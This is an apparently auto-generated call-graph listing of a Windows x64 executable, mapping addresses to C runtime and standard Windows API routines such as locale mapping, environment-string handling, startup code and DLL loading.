__crtLCMapStringW 19697->19714 19701 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19698->19701 19702 7ff6d926706f 19699->19702 19703 7ff6d9267093 19700->19703 19704 7ff6d92670a5 19700->19704 19705 7ff6d926700e 19701->19705 19706 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19702->19706 19707 7ff6d9254f08 _get_daylight 11 API calls 19703->19707 19708 7ff6d9254f4c 45 API calls 19704->19708 19705->19534 19706->19714 19709 7ff6d9267098 19707->19709 19710 7ff6d92670b2 19708->19710 19711 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19709->19711 19710->19714 20073 7ff6d9268b08 19710->20073 19711->19714 19714->19534 19715 7ff6d9254f08 _get_daylight 11 API calls 19715->19714 19717 7ff6d92591b1 19716->19717 19718 7ff6d92591ad 19716->19718 19739 7ff6d92625f0 19717->19739 19718->19606 19731 7ff6d92594ec 19718->19731 19723 7ff6d92591c3 19725 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19723->19725 19724 7ff6d92591cf 19765 7ff6d925927c 19724->19765 19725->19718 19728 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19729 7ff6d92591f6 19728->19729 19730 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19729->19730 19730->19718 19732 7ff6d9259515 19731->19732 19733 7ff6d925952e 19731->19733 19732->19606 19733->19732 19734 7ff6d925eb98 _get_daylight 11 API calls 19733->19734 19735 7ff6d92607e8 WideCharToMultiByte 19733->19735 19736 7ff6d92595be 19733->19736 19738 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19733->19738 19734->19733 19735->19733 19737 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19736->19737 19737->19732 19738->19733 19740 7ff6d92625fd 19739->19740 19741 7ff6d92591b6 19739->19741 19784 7ff6d925b224 19740->19784 19745 7ff6d926292c GetEnvironmentStringsW 19741->19745 19746 7ff6d926295c 19745->19746 19747 7ff6d92591bb 19745->19747 19748 7ff6d92607e8 WideCharToMultiByte 19746->19748 19747->19723 19747->19724 19749 7ff6d92629ad 19748->19749 19750 7ff6d92629b4 FreeEnvironmentStringsW 19749->19750 19751 7ff6d925d5fc _fread_nolock 12 API calls 19749->19751 19750->19747 19752 7ff6d92629c7 19751->19752 19753 7ff6d92629d8 19752->19753 19754 7ff6d92629cf 19752->19754 19756 7ff6d92607e8 WideCharToMultiByte 19753->19756 19755 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19754->19755 19757 7ff6d92629d6 19755->19757 19758 7ff6d92629fb 19756->19758 19757->19750 19759 7ff6d9262a09 19758->19759 19760 7ff6d92629ff 19758->19760 19762 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19759->19762 19761 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19760->19761 19763 7ff6d9262a07 FreeEnvironmentStringsW 19761->19763 19762->19763 19763->19747 19766 7ff6d92592a1 19765->19766 19767 7ff6d925eb98 _get_daylight 11 API calls 19766->19767 19779 7ff6d92592d7 19767->19779 19768 7ff6d92592df 19769 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19768->19769 19770 7ff6d92591d7 19769->19770 19770->19728 19771 7ff6d9259352 19772 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19771->19772 19772->19770 19773 7ff6d925eb98 _get_daylight 11 API calls 19773->19779 19774 7ff6d9259341 19776 7ff6d92594a8 11 API calls 19774->19776 19775 7ff6d925a4a4 __std_exception_copy 37 API calls 19775->19779 19777 7ff6d9259349 19776->19777 19780 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19777->19780 19778 7ff6d9259377 19781 7ff6d925a900 _isindst 17 API calls 19778->19781 19779->19768 19779->19771 19779->19773 19779->19774 19779->19775 19779->19778 19782 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19779->19782 19780->19768 19783 7ff6d925938a 19781->19783 19782->19779 19785 7ff6d925b235 FlsGetValue 19784->19785 19786 7ff6d925b250 FlsSetValue 19784->19786 19788 7ff6d925b242 19785->19788 19789 7ff6d925b24a 19785->19789 19787 7ff6d925b25d 19786->19787 19786->19788 19791 7ff6d925eb98 _get_daylight 11 API calls 19787->19791 19790 7ff6d925a504 __CxxCallCatchBlock 45 API calls 19788->19790 19792 7ff6d925b248 19788->19792 19789->19786 19793 7ff6d925b2c5 19790->19793 19794 7ff6d925b26c 19791->19794 19804 7ff6d92622c4 19792->19804 19795 7ff6d925b28a FlsSetValue 19794->19795 19796 7ff6d925b27a FlsSetValue 19794->19796 19798 7ff6d925b296 FlsSetValue 19795->19798 19799 7ff6d925b2a8 19795->19799 19797 7ff6d925b283 19796->19797 19800 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19797->19800 19798->19797 19801 7ff6d925aef4 _get_daylight 11 API calls 19799->19801 19800->19788 19802 7ff6d925b2b0 19801->19802 19803 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19802->19803 19803->19792 19827 7ff6d9262534 19804->19827 19806 7ff6d92622f9 19842 7ff6d9261fc4 19806->19842 19809 7ff6d925d5fc _fread_nolock 12 API calls 19810 7ff6d9262327 19809->19810 19811 7ff6d926232f 19810->19811 19813 7ff6d926233e 19810->19813 19812 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19811->19812 19826 7ff6d9262316 19812->19826 19813->19813 19849 7ff6d926266c 19813->19849 19816 7ff6d926243a 19818 7ff6d9254f08 _get_daylight 11 API calls 19816->19818 19817 7ff6d9262454 19821 7ff6d9262495 19817->19821 19823 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19817->19823 19819 7ff6d926243f 19818->19819 19822 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19819->19822 19820 7ff6d92624fc 19825 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19820->19825 19821->19820 19860 7ff6d9261df4 19821->19860 19822->19826 19823->19821 19825->19826 19826->19741 19828 7ff6d9262557 19827->19828 19829 7ff6d9262561 19828->19829 19875 7ff6d92602d8 EnterCriticalSection 19828->19875 19832 7ff6d92625d3 19829->19832 19834 7ff6d925a504 __CxxCallCatchBlock 45 API calls 19829->19834 19832->19806 19836 7ff6d92625eb 19834->19836 19838 7ff6d925b224 50 API calls 19836->19838 19841 7ff6d9262642 19836->19841 19839 7ff6d926262c 19838->19839 19840 7ff6d92622c4 65 API calls 19839->19840 19840->19841 19841->19806 19843 7ff6d9254f4c 45 API calls 19842->19843 19844 7ff6d9261fd8 19843->19844 19845 7ff6d9261ff6 19844->19845 19846 7ff6d9261fe4 GetOEMCP 19844->19846 19847 7ff6d926200b 19845->19847 19848 7ff6d9261ffb GetACP 19845->19848 19846->19847 19847->19809 19847->19826 19848->19847 19850 7ff6d9261fc4 47 API calls 19849->19850 19851 7ff6d9262699 19850->19851 19852 7ff6d92627ef 19851->19852 19854 7ff6d92626d6 IsValidCodePage 19851->19854 19859 7ff6d92626f0 __scrt_get_show_window_mode 19851->19859 19853 7ff6d924c550 _log10_special 8 API calls 19852->19853 19855 7ff6d9262431 19853->19855 19854->19852 19856 7ff6d92626e7 19854->19856 19855->19816 19855->19817 19857 7ff6d9262716 GetCPInfo 19856->19857 19856->19859 19857->19852 19857->19859 19859->19859 19876 7ff6d92620dc 19859->19876 19932 7ff6d92602d8 EnterCriticalSection 19860->19932 19877 7ff6d9262119 GetCPInfo 19876->19877 19878 7ff6d926220f 19876->19878 19877->19878 19880 7ff6d926212c 19877->19880 19879 7ff6d924c550 _log10_special 8 API calls 19878->19879 19881 7ff6d92622ae 19879->19881 19882 7ff6d9262e40 48 API calls 19880->19882 19881->19852 19883 7ff6d92621a3 19882->19883 19887 7ff6d9267b84 19883->19887 19886 7ff6d9267b84 54 API calls 19886->19878 19888 7ff6d9254f4c 45 API calls 19887->19888 19889 7ff6d9267ba9 19888->19889 19892 7ff6d9267850 19889->19892 19893 7ff6d9267891 19892->19893 19894 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19893->19894 19897 7ff6d92678db 19894->19897 19895 7ff6d9267b59 19896 7ff6d924c550 _log10_special 8 API calls 19895->19896 19898 7ff6d92621d6 19896->19898 19897->19895 19899 7ff6d925d5fc _fread_nolock 12 API calls 19897->19899 19900 7ff6d9267a11 19897->19900 19902 7ff6d9267913 19897->19902 19898->19886 19899->19902 19900->19895 19901 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19900->19901 19901->19895 19902->19900 19903 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19902->19903 19904 7ff6d9267986 19903->19904 19904->19900 19923 7ff6d925f0e4 19904->19923 19907 7ff6d9267a22 19909 7ff6d925d5fc _fread_nolock 12 API calls 19907->19909 19911 7ff6d9267af4 19907->19911 19912 7ff6d9267a40 19907->19912 19908 7ff6d92679d1 19908->19900 19910 7ff6d925f0e4 __crtLCMapStringW 6 API calls 19908->19910 19909->19912 19910->19900 19911->19900 19913 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19911->19913 19912->19900 19914 7ff6d925f0e4 __crtLCMapStringW 6 API calls 19912->19914 19913->19900 19915 7ff6d9267ac0 19914->19915 19915->19911 19916 7ff6d9267af6 19915->19916 19917 7ff6d9267ae0 19915->19917 19919 7ff6d92607e8 WideCharToMultiByte 19916->19919 19918 7ff6d92607e8 WideCharToMultiByte 19917->19918 19920 7ff6d9267aee 19918->19920 19919->19920 19920->19911 19921 7ff6d9267b0e 19920->19921 19921->19900 19922 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19921->19922 19922->19900 19924 7ff6d925ed10 __crtLCMapStringW 5 API calls 19923->19924 19925 7ff6d925f122 19924->19925 19926 7ff6d925f12a 19925->19926 19929 7ff6d925f1d0 19925->19929 19926->19900 19926->19907 19926->19908 19928 7ff6d925f193 LCMapStringW 19928->19926 19930 7ff6d925ed10 __crtLCMapStringW 5 API calls 19929->19930 19931 7ff6d925f1fe __crtLCMapStringW 19930->19931 19931->19928 19934 7ff6d92662d8 19933->19934 19935 7ff6d92662c1 19933->19935 19934->19935 19937 7ff6d92662e6 19934->19937 19936 7ff6d9254f08 _get_daylight 11 API calls 19935->19936 19938 7ff6d92662c6 19936->19938 19940 7ff6d9254f4c 45 API calls 19937->19940 19941 7ff6d92662d1 19937->19941 19939 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19938->19939 19939->19941 19940->19941 19941->19616 19943 7ff6d9254f4c 45 API calls 19942->19943 19944 7ff6d9268f71 19943->19944 19947 7ff6d9268bc8 19944->19947 19949 7ff6d9268c16 19947->19949 19948 7ff6d924c550 _log10_special 8 API calls 19950 7ff6d9267205 19948->19950 19951 7ff6d9268c9d 19949->19951 19953 7ff6d9268c88 GetCPInfo 19949->19953 19956 7ff6d9268ca1 19949->19956 19950->19616 19950->19642 19952 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19951->19952 19951->19956 19954 7ff6d9268d35 19952->19954 19953->19951 19953->19956 19955 7ff6d925d5fc _fread_nolock 12 API calls 19954->19955 19954->19956 19957 7ff6d9268d6c 19954->19957 19955->19957 19956->19948 19957->19956 19958 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19957->19958 19959 7ff6d9268dda 19958->19959 19960 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19959->19960 19969 7ff6d9268ebc 19959->19969 19962 7ff6d9268e00 19960->19962 19961 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19961->19956 19963 7ff6d925d5fc _fread_nolock 12 API calls 19962->19963 19964 7ff6d9268e2d 19962->19964 19962->19969 19963->19964 19965 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 19964->19965 19964->19969 19966 7ff6d9268ea4 19965->19966 19967 7ff6d9268eaa 19966->19967 19968 7ff6d9268ec4 19966->19968 19967->19969 19971 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19967->19971 19976 7ff6d925ef68 19968->19976 19969->19956 19969->19961 19971->19969 19973 7ff6d9268f03 19973->19956 19975 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19973->19975 19974 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19974->19973 19975->19956 19977 7ff6d925ed10 __crtLCMapStringW 5 API calls 19976->19977 19978 7ff6d925efa6 19977->19978 19979 7ff6d925efae 19978->19979 19980 7ff6d925f1d0 __crtLCMapStringW 5 API calls 19978->19980 19979->19973 19979->19974 19981 7ff6d925f017 CompareStringW 19980->19981 19981->19979 19983 7ff6d9267c5a HeapSize 19982->19983 19984 7ff6d9267c41 19982->19984 19985 7ff6d9254f08 _get_daylight 11 API calls 19984->19985 19986 7ff6d9267c46 19985->19986 19987 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 19986->19987 19988 7ff6d9267c51 19987->19988 19988->19646 19990 7ff6d9267c89 19989->19990 19991 7ff6d9267c93 19989->19991 19993 7ff6d925d5fc _fread_nolock 12 API calls 19990->19993 19992 7ff6d9267c98 19991->19992 20000 7ff6d9267c9f _get_daylight 19991->20000 19994 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 19992->19994 19997 7ff6d9267c91 19993->19997 19994->19997 19995 7ff6d9267cd2 HeapReAlloc 19995->19997 19995->20000 19996 7ff6d9267ca5 19998 7ff6d9254f08 _get_daylight 11 API calls 19996->19998 19997->19651 19998->19997 19999 7ff6d9263590 _get_daylight 2 API calls 19999->20000 20000->19995 20000->19996 20000->19999 20002 7ff6d925ed10 __crtLCMapStringW 5 API calls 20001->20002 20003 7ff6d925ef44 20002->20003 20003->19656 20005 7ff6d92554fa 20004->20005 20006 7ff6d92554d6 20004->20006 20007 7ff6d9255554 20005->20007 20008 7ff6d92554ff 20005->20008 20010 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20006->20010 20013 7ff6d92554e5 20006->20013 20009 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 20007->20009 20011 7ff6d9255514 20008->20011 20008->20013 20014 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20008->20014 20020 7ff6d9255570 20009->20020 20010->20013 20015 7ff6d925d5fc _fread_nolock 12 API calls 20011->20015 20012 7ff6d9255577 GetLastError 20016 7ff6d9254e7c _fread_nolock 11 API calls 20012->20016 20013->19659 20013->19660 20014->20011 20015->20013 20019 7ff6d9255584 20016->20019 20017 7ff6d92555b2 20017->20013 20018 7ff6d925f8a0 _fread_nolock MultiByteToWideChar 20017->20018 20023 7ff6d92555f6 20018->20023 20024 7ff6d9254f08 _get_daylight 11 API calls 20019->20024 20020->20012 20020->20017 20021 7ff6d92555a5 20020->20021 20025 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20020->20025 20022 7ff6d925d5fc _fread_nolock 12 API calls 20021->20022 20022->20017 20023->20012 20023->20013 20024->20013 20025->20021 20027 7ff6d9259225 20026->20027 20034 7ff6d9259221 20026->20034 20047 7ff6d9262a3c GetEnvironmentStringsW 20027->20047 20030 7ff6d9259232 20032 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20030->20032 20031 7ff6d925923e 20054 7ff6d925938c 20031->20054 20032->20034 20034->19690 20039 7ff6d92595cc 20034->20039 20036 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20037 7ff6d9259265 20036->20037 20038 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20037->20038 20038->20034 20040 7ff6d92595ef 20039->20040 20045 7ff6d9259606 20039->20045 20040->19690 20041 7ff6d925f8a0 MultiByteToWideChar _fread_nolock 20041->20045 20042 7ff6d925eb98 _get_daylight 11 API calls 20042->20045 20043 7ff6d925967a 20044 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20043->20044 20044->20040 20045->20040 20045->20041 20045->20042 20045->20043 20046 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20045->20046 20046->20045 20048 7ff6d925922a 20047->20048 20049 7ff6d9262a60 20047->20049 20048->20030 20048->20031 20050 7ff6d925d5fc _fread_nolock 12 API calls 20049->20050 20051 7ff6d9262a97 memcpy_s 20050->20051 20052 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20051->20052 20053 7ff6d9262ab7 FreeEnvironmentStringsW 20052->20053 20053->20048 20055 7ff6d92593b4 20054->20055 20056 7ff6d925eb98 _get_daylight 11 API calls 20055->20056 20069 7ff6d92593ef 20056->20069 20057 7ff6d92593f7 20058 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20057->20058 20059 7ff6d9259246 20058->20059 20059->20036 20060 7ff6d9259471 20061 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20060->20061 20061->20059 20062 7ff6d925eb98 _get_daylight 11 API calls 20062->20069 20063 7ff6d9259460 20064 7ff6d92594a8 11 API calls 20063->20064 20066 7ff6d9259468 20064->20066 20065 7ff6d9260474 37 API calls 20065->20069 20067 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20066->20067 20067->20057 20068 7ff6d9259494 20070 7ff6d925a900 _isindst 17 API calls 20068->20070 20069->20057 20069->20060 20069->20062 20069->20063 20069->20065 20069->20068 20071 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20069->20071 20072 7ff6d92594a6 20070->20072 20071->20069 20075 7ff6d9268b31 __crtLCMapStringW 20073->20075 20074 7ff6d92670ee 20074->19714 20074->19715 20075->20074 20076 7ff6d925ef68 6 API calls 20075->20076 20076->20074 20312 7ff6d924cb50 20313 7ff6d924cb60 20312->20313 20329 7ff6d9259ba8 20313->20329 20315 7ff6d924cb6c 20335 7ff6d924ce48 20315->20335 20317 7ff6d924d12c 7 API calls 20318 7ff6d924cc05 20317->20318 20319 7ff6d924cb84 _RTC_Initialize 20327 7ff6d924cbd9 20319->20327 20340 7ff6d924cff8 20319->20340 20321 7ff6d924cb99 20343 7ff6d9259014 20321->20343 20327->20317 20328 7ff6d924cbf5 20327->20328 20330 7ff6d9259bb9 20329->20330 20331 7ff6d9254f08 _get_daylight 11 API calls 20330->20331 20334 7ff6d9259bc1 20330->20334 20332 7ff6d9259bd0 20331->20332 20333 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 20332->20333 20333->20334 20334->20315 20336 7ff6d924ce59 20335->20336 20339 7ff6d924ce5e __scrt_acquire_startup_lock 20335->20339 20337 7ff6d924d12c 7 API calls 20336->20337 20336->20339 20338 7ff6d924ced2 20337->20338 20339->20319 20368 7ff6d924cfbc 20340->20368 20342 7ff6d924d001 20342->20321 20344 7ff6d9259034 20343->20344 20358 7ff6d924cba5 20343->20358 20345 7ff6d925903c 20344->20345 20346 7ff6d9259052 GetModuleFileNameW 20344->20346 20347 7ff6d9254f08 _get_daylight 11 API calls 20345->20347 20350 7ff6d925907d 20346->20350 20348 7ff6d9259041 20347->20348 20349 7ff6d925a8e0 _invalid_parameter_noinfo 37 API calls 20348->20349 20349->20358 20351 7ff6d9258fb4 11 API calls 20350->20351 20352 7ff6d92590bd 20351->20352 20353 7ff6d92590c5 20352->20353 20356 7ff6d92590dd 20352->20356 20354 7ff6d9254f08 _get_daylight 11 API calls 20353->20354 20355 7ff6d92590ca 20354->20355 20357 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20355->20357 20360 7ff6d925912b 20356->20360 20361 7ff6d9259144 20356->20361 20366 7ff6d92590ff 20356->20366 20357->20358 20358->20327 20367 7ff6d924d0cc InitializeSListHead 20358->20367 20359 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20359->20358 20362 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20360->20362 20364 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20361->20364 20363 7ff6d9259134 20362->20363 20365 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20363->20365 20364->20366 20365->20358 20366->20359 20369 7ff6d924cfd6 20368->20369 20371 7ff6d924cfcf 20368->20371 20372 7ff6d925a1ec 20369->20372 20371->20342 20375 7ff6d9259e28 20372->20375 20382 7ff6d92602d8 EnterCriticalSection 20375->20382 20383 7ff6d9259d50 20386 7ff6d9259ccc 20383->20386 20393 7ff6d92602d8 EnterCriticalSection 20386->20393 20500 7ff6d925afd0 20501 7ff6d925afd5 20500->20501 20502 7ff6d925afea 20500->20502 20506 7ff6d925aff0 20501->20506 20507 7ff6d925b032 20506->20507 20508 7ff6d925b03a 20506->20508 20509 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20507->20509 20510 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20508->20510 20509->20508 20511 7ff6d925b047 20510->20511 20512 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20511->20512 20513 7ff6d925b054 20512->20513 20514 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20513->20514 20515 7ff6d925b061 20514->20515 20516 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20515->20516 20517 7ff6d925b06e 20516->20517 20518 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20517->20518 20519 7ff6d925b07b 20518->20519 20520 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20519->20520 20521 7ff6d925b088 20520->20521 20522 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20521->20522 20523 7ff6d925b095 20522->20523 20524 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20523->20524 20525 7ff6d925b0a5 20524->20525 20526 7ff6d925a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 20525->20526 20527 7ff6d925b0b5 20526->20527 20532 7ff6d925ae94 20527->20532 20546 7ff6d92602d8 EnterCriticalSection 20532->20546 15895 7ff6d924cc3c 15916 7ff6d924ce0c 15895->15916 15898 7ff6d924cd88 16070 7ff6d924d12c IsProcessorFeaturePresent 15898->16070 15899 7ff6d924cc58 __scrt_acquire_startup_lock 15901 7ff6d924cd92 15899->15901 15903 7ff6d924cc76 __scrt_release_startup_lock 15899->15903 15902 7ff6d924d12c 7 API calls 15901->15902 15905 7ff6d924cd9d __CxxCallCatchBlock 15902->15905 15904 7ff6d924cc9b 15903->15904 15906 7ff6d924cd21 15903->15906 16059 7ff6d9259b2c 15903->16059 15922 7ff6d924d274 15906->15922 15908 7ff6d924cd26 15925 7ff6d9241000 15908->15925 15913 7ff6d924cd49 15913->15905 16066 7ff6d924cf90 15913->16066 15917 7ff6d924ce14 15916->15917 15918 7ff6d924ce20 __scrt_dllmain_crt_thread_attach 15917->15918 15919 7ff6d924cc50 15918->15919 15920 7ff6d924ce2d 15918->15920 15919->15898 15919->15899 15920->15919 16077 7ff6d924d888 15920->16077 16104 7ff6d926a4d0 15922->16104 15924 7ff6d924d28b GetStartupInfoW 15924->15908 15926 7ff6d9241009 15925->15926 16106 7ff6d9255484 15926->16106 15928 7ff6d92437fb 16113 7ff6d92436b0 15928->16113 15934 7ff6d924383c 16273 7ff6d9241c80 15934->16273 15935 7ff6d924391b 16282 7ff6d92445c0 15935->16282 15939 7ff6d924385b 16185 7ff6d9248830 15939->16185 15942 7ff6d924396a 16305 7ff6d9242710 15942->16305 15944 7ff6d924388e 15952 7ff6d92438bb __std_exception_copy 15944->15952 16277 7ff6d92489a0 15944->16277 15946 7ff6d924395d 15947 7ff6d9243984 15946->15947 15948 7ff6d9243962 15946->15948 15950 7ff6d9241c80 49 API calls 15947->15950 16301 7ff6d925004c 15948->16301 15953 7ff6d92439a3 15950->15953 15954 7ff6d9248830 14 API calls 15952->15954 15961 7ff6d92438de __std_exception_copy 15952->15961 15958 7ff6d9241950 115 API calls 15953->15958 15954->15961 15956 7ff6d9243a0b 15957 7ff6d92489a0 40 API calls 15956->15957 15959 7ff6d9243a17 15957->15959 15960 7ff6d92439ce 15958->15960 15962 7ff6d92489a0 40 API calls 15959->15962 15960->15939 15963 7ff6d92439de 15960->15963 15967 7ff6d924390e __std_exception_copy 15961->15967 16316 7ff6d9248940 15961->16316 15964 7ff6d9243a23 15962->15964 15965 7ff6d9242710 54 API calls 15963->15965 15966 7ff6d92489a0 40 API calls 15964->15966 16007 7ff6d9243808 __std_exception_copy 15965->16007 15966->15967 15968 7ff6d9248830 14 API calls 15967->15968 15969 7ff6d9243a3b 15968->15969 15970 7ff6d9243b2f 15969->15970 15971 7ff6d9243a60 __std_exception_copy 15969->15971 15972 7ff6d9242710 54 API calls 15970->15972 15973 7ff6d9248940 40 API calls 15971->15973 15984 7ff6d9243aab 15971->15984 15972->16007 15973->15984 15974 7ff6d9248830 14 API calls 15975 7ff6d9243bf4 __std_exception_copy 15974->15975 15976 7ff6d9243c46 15975->15976 15977 7ff6d9243d41 15975->15977 15978 7ff6d9243c50 15976->15978 15979 7ff6d9243cd4 15976->15979 16332 7ff6d92444e0 15977->16332 16198 7ff6d92490e0 15978->16198 15982 7ff6d9248830 14 API calls 15979->15982 15986 7ff6d9243ce0 15982->15986 15983 7ff6d9243d4f 15987 7ff6d9243d71 15983->15987 15988 7ff6d9243d65 15983->15988 15984->15974 15989 7ff6d9243c61 15986->15989 15992 7ff6d9243ced 15986->15992 15991 7ff6d9241c80 49 API calls 15987->15991 16335 7ff6d9244630 15988->16335 15994 7ff6d9242710 54 API calls 15989->15994 16001 7ff6d9243cc8 __std_exception_copy 15991->16001 15995 7ff6d9241c80 49 API calls 15992->15995 15994->16007 15998 7ff6d9243d0b 15995->15998 15996 7ff6d9243dc4 16248 7ff6d9249390 15996->16248 15998->16001 16002 7ff6d9243d12 15998->16002 16000 7ff6d9243dd7 SetDllDirectoryW 16006 7ff6d9243e0a 16000->16006 16049 7ff6d9243e5a 16000->16049 16001->15996 16003 7ff6d9243da7 SetDllDirectoryW LoadLibraryExW 16001->16003 16005 7ff6d9242710 54 API calls 16002->16005 16003->15996 16005->16007 16008 7ff6d9248830 14 API calls 16006->16008 16323 7ff6d924c550 16007->16323 16016 7ff6d9243e16 __std_exception_copy 16008->16016 16009 7ff6d9244008 16011 7ff6d9244035 16009->16011 16012 7ff6d9244012 PostMessageW GetMessageW 16009->16012 16010 7ff6d9243f1b 16253 7ff6d92433c0 16010->16253 16412 7ff6d9243360 16011->16412 16012->16011 16019 7ff6d9243ef2 16016->16019 16023 7ff6d9243e4e 16016->16023 16022 7ff6d9248940 40 API calls 16019->16022 16022->16049 16023->16049 16338 7ff6d9246dc0 16023->16338 16049->16009 16049->16010 16060 7ff6d9259b43 16059->16060 16061 7ff6d9259b64 16059->16061 16060->15906 18654 7ff6d925a3d8 16061->18654 16064 7ff6d924d2b8 GetModuleHandleW 16065 7ff6d924d2c9 16064->16065 16065->15913 16067 7ff6d924cfa1 16066->16067 16068 7ff6d924cd60 16067->16068 16069 7ff6d924d888 7 API calls 16067->16069 16068->15904 16069->16068 16071 7ff6d924d152 __CxxCallCatchBlock __scrt_get_show_window_mode 16070->16071 16072 7ff6d924d171 RtlCaptureContext RtlLookupFunctionEntry 16071->16072 16073 7ff6d924d19a RtlVirtualUnwind 16072->16073 16074 7ff6d924d1d6 __scrt_get_show_window_mode 16072->16074 16073->16074 16075 7ff6d924d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16074->16075 16076 7ff6d924d256 __CxxCallCatchBlock 16075->16076 16076->15901 16078 7ff6d924d89a 16077->16078 16079 7ff6d924d890 16077->16079 16078->15919 16083 7ff6d924dc24 16079->16083 16084 7ff6d924dc33 16083->16084 16085 7ff6d924d895 16083->16085 16091 7ff6d924de60 16084->16091 16087 7ff6d924dc90 16085->16087 16088 7ff6d924dcbb 16087->16088 16089 7ff6d924dc9e DeleteCriticalSection 16088->16089 16090 7ff6d924dcbf 16088->16090 16089->16088 16090->16078 16095 7ff6d924dcc8 16091->16095 16096 7ff6d924ddb2 TlsFree 16095->16096 16102 7ff6d924dd0c __vcrt_FlsAlloc 16095->16102 16097 7ff6d924dd3a LoadLibraryExW 16099 7ff6d924dd5b GetLastError 16097->16099 16100 7ff6d924ddd9 16097->16100 16098 7ff6d924ddf9 GetProcAddress 16098->16096 16099->16102 16100->16098 16101 7ff6d924ddf0 FreeLibrary 16100->16101 16101->16098 16102->16096 16102->16097 16102->16098 16103 7ff6d924dd7d LoadLibraryExW 16102->16103 16103->16100 16103->16102 16105 7ff6d926a4c0 16104->16105 16105->15924 16105->16105 16107 7ff6d925f480 16106->16107 16109 7ff6d925f526 16107->16109 16110 7ff6d925f4d3 16107->16110 16435 7ff6d925f358 16109->16435 16425 7ff6d925a814 16110->16425 16112 7ff6d925f4fc 16112->15928 16542 7ff6d924c850 16113->16542 16116 7ff6d92436eb GetLastError 16549 7ff6d9242c50 16116->16549 16117 7ff6d9243710 16544 7ff6d9249280 FindFirstFileExW 16117->16544 16121 7ff6d924377d 16575 7ff6d9249440 16121->16575 16122 7ff6d9243723 16564 7ff6d9249300 CreateFileW 16122->16564 16124 7ff6d924c550 _log10_special 8 API calls 16127 7ff6d92437b5 16124->16127 16127->16007 16135 7ff6d9241950 16127->16135 16128 7ff6d924378b 